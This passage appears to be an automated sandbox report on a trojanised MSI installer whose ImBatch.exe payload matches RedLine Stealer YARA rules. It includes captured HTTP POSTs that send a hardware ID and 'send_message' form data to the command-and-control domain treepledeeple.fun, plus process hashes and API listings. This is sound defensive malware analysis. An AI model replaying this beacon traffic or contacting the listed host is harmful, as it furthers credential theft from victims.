Sep 15, 2023 11:23:22.690176010 CEST	363	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:23.285207987 CEST	364	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=m5avh5o4fr5jsa5mopdvedp1k4; expires=Tue, 09 Jan 2024 03:10:01 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oQ8UbwkpMjFSgWKrPwGBPfqeDIIs9%2FT9D4JG%2BBVz2RFqpbnsFmjOgJrAgrICu%2BNJ%2B9KLOOHv8IbBdUYZJw1tWEHjuHG5eTk8Gfm1pjJZVViQ3U9ntz8tMX3FKZFinYKO%2FSaYzw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf83090a4309-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:23.285222054 CEST	365	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49727	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:23.501359940 CEST	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:23.501979113 CEST	366	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:23.811619043 CEST	367	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=48d5ae457b70gadohk7t63ql2o; expires=Tue, 09 Jan 2024 03:10:02 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MfBf94i8DUULX51Hau%2FQvit59eEYi2JhUvSHQQ5Hqiu8PQIta%2FZ7rJFBrXxnhCWhmoqwMHSLdpSvpWG%2B3sBFc5LK4CalP3PmnLEGHRRDQkBFFBDlvMfn0s9rCpokImVea7R0iQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf881aa041c1-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:23.811631918 CEST	367	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49728	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:24.020549059 CEST	368	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:24.021140099 CEST	368	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:24.316487074 CEST	371	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ht4mcb4b19s94502knm9kmpt31; expires=Tue, 09 Jan 2024 03:10:03 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:24 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jbqdDg32rdN7lgn2782ZHgsjcfrQXagOzIjm76%2BFIb2sFsgoFLlkoN5p3M4BUYeRNMcHhJrs78EhiQcmO5eW40BOjWeRFU7ScInS25HoW4RKsE%2BrmmrX%2Fusw%2BBFeAuLspnOlMA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf8b5ccf0f8b-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:24.316580057 CEST	371	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49731	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:24.523438931 CEST	371	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:24.524049997 CEST	372	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:24.882894039 CEST	416	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=si0km2pk70t318iqjoj436haqa; expires=Tue, 09 Jan 2024 03:10:03 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:24 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CUtJ%2BN2Iv6OyDAQ5iLuvar487gHsMvtu0vU5sph5XtO71%2BLXoftqHIskl%2FTIsctBGg4NPiWJxTPxNhqzidmWM4Y2ldbbKr8ePNdD6SeyLcPsWT5jdbj%2BxZzIrmljyWK0n1%2FjRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf8e7acc4333-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:24.883013010 CEST	416	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49721	104.193.111.101	443	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	Direction	Data
2023-09-15 09:23:19 UTC	OUT	GET /upd/imbatch/version HTTP/1.1 User-Agent: ImBatchUpdater Host: www.highmotionsoftware.com
2023-09-15 09:23:19 UTC	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:19 GMT Server: Apache Last-Modified: Thu, 04 May 2023 16:40:26 GMT Accept-Ranges: bytes Content-Length: 5 Cache-Control: max-age=1209600 Expires: Fri, 29 Sep 2023 09:23:19 GMT Connection: close
2023-09-15 09:23:19 UTC	IN	Data Raw: 37 2e 36 2e 30 Data Ascii: 7.6.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49722	104.193.111.101	443	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	Direction	Data
2023-09-15 09:23:19 UTC	OUT	GET /upd/imbatch/url HTTP/1.1 User-Agent: ImBatchUpdater Host: www.highmotionsoftware.com
2023-09-15 09:23:19 UTC	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:19 GMT Server: Apache Last-Modified: Wed, 07 Oct 2020 14:10:43 GMT Accept-Ranges: bytes Content-Length: 58 Cache-Control: max-age=1209600 Expires: Fri, 29 Sep 2023 09:23:19 GMT Connection: close
2023-09-15 09:23:19 UTC	IN	Data Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 69 67 68 6d 6f 74 69 6f 6e 73 6f 66 74 77 61 72 65 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2d 63 65 6e 74 65 72 2f 69 6d 62 61 74 63 68 Data Ascii: https://www.highmotionsoftware.com/download-center/imbatch

Target ID:	0
Start time:	11:23:03
Start date:	15/09/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\promot_s.msi"
Imagebase:	0x7ff7ebfe0000
File size:	66'048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:23:05
Start date:	15/09/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7ebfe0000
File size:	66'048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	11:23:06
Start date:	15/09/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding A3469819A8715BFB02FD0117F532ABA5
Imagebase:	0x9b0000
File size:	59'904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:23:10
Start date:	15/09/2023
Path:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe
Imagebase:	0x400000
File size:	7'767'096 bytes
MD5 hash:	13D6ED715E2ADD3C52A9E6A0C79649DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Windows_Trojan_RedLineStealer_a7da40b7, Description: unknown, Source: 00000003.00000002.431118657.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_a7da40b7, Description: unknown, Source: 00000003.00000002.429544936.00000000020E1000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_d4b38e13, Description: unknown, Source: 00000003.00000002.429544936.00000000020E1000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	18.4%
Total number of Nodes:	604
Total number of Limit Nodes:	48

Executed Functions

Function 1080A4B4 Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,1080A678,?,?,?,00000000,00000105,00000000,1080A6AF,?,1080FC30), ref: 1080A4D0
GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,1080A678,?,?,?,00000000,00000105,00000000,1080A6AF,?,1080FC30), ref: 1080A4D9

Part of subcall function 1080A3CC: FindFirstFileW.KERNEL32(?,?,00000000), ref: 1080A3E6
Part of subcall function 1080A3CC: FindClose.KERNEL32(00000000,?,?,00000000), ref: 1080A3F6

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: c62f3df936cc8ade3ca8ce64e70b6f0fdc5f32b7750b6bdae6152e23378de8b0
Instruction ID: db0b784b9103c87155c7dd59dee8911d2ea7ed2056ea0b3beb9789df11b94886
Opcode Fuzzy Hash: c62f3df936cc8ade3ca8ce64e70b6f0fdc5f32b7750b6bdae6152e23378de8b0
Instruction Fuzzy Hash: CFF0347920520AAFDB00CE9CDCC8EA6B7D8FF082A4F015594F94CCB310C671EC808B60

Uniqueness

Uniqueness Score: -1.00%

Function 1080A3CC Relevance: 3.0, APIs: 2, Instructions: 21
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNEL32(?,?,00000000), ref: 1080A3E6
FindClose.KERNEL32(00000000,?,?,00000000), ref: 1080A3F6

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a45bfd4d879f0ad24d6aaca6941b00ecbd4bf427b2096baca27e839c1b0f7cf0
Instruction ID: e01c5ba495c85a6d5bfbdd4e0d11138f189695608d4322707ae1a22ecd3885df
Opcode Fuzzy Hash: a45bfd4d879f0ad24d6aaca6941b00ecbd4bf427b2096baca27e839c1b0f7cf0
Instruction Fuzzy Hash: 77D02B7250820917CB60C9BC8C89A8EB34CDB00130F0407517D58D32D0FA21E9500598

Uniqueness

Uniqueness Score: -1.00%

Function 109E8C5C Relevance: 1.6, APIs: 1, Instructions: 356
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(109ECD1E), ref: 109E8C7D

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 6e52059545838233189a54bc45a4919ae37581d1e65846e2463f91112ca2f51c
Instruction ID: ee2b11bdfaf71760e75c0decc115424df4c70b8d866901165230f9e65dd05627
Opcode Fuzzy Hash: 6e52059545838233189a54bc45a4919ae37581d1e65846e2463f91112ca2f51c
Instruction Fuzzy Hash: DEF1FA74A44149DFD704CB99CAA6F9DB7F1EF84304F6981B4E408AB3A6C634AF11EB44

Uniqueness

Uniqueness Score: -1.00%

Function 1080B08A Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 1080B090

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9abbbcb7e4612bb8f1a381e6fbd200804543c6a428e390df111be8645721e9d3
Instruction ID: 1ca6e56511f170b7aa8548fc9c9bb3187ec9e385a541e40dc390cc8ff043e807
Opcode Fuzzy Hash: 9abbbcb7e4612bb8f1a381e6fbd200804543c6a428e390df111be8645721e9d3
Instruction Fuzzy Hash: F7B0126460C5010BC604972C4C4344B31C09A50020FC40220747CD5281F64ED9A603DB

Uniqueness

Uniqueness Score: -1.00%

Function 109E11B8 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b521e15e374a457c5d3ef683687f91bd4cd360e759e07d63df4b6589575e07cf
Instruction ID: 6dc35651ea51178ba290a95b75ef231980f94a650af5e6e7f623aa8262027924
Opcode Fuzzy Hash: b521e15e374a457c5d3ef683687f91bd4cd360e759e07d63df4b6589575e07cf
Instruction Fuzzy Hash: FB91F874A04644AFD704DF9EC891B8EBBF2FF88314F0581A8E544AB3A6D631E981CF44

Uniqueness

Uniqueness Score: -1.00%

Function 1080A060 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,1080A245,?,00000000), ref: 1080A099
lstrcpynW.KERNEL32(?,00000000,00000105,00000000,1080A245,?,00000000), ref: 1080A0B5
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,1080A245,?,00000000), ref: 1080A0E2
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,1080A245), ref: 1080A100
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 1080A11E
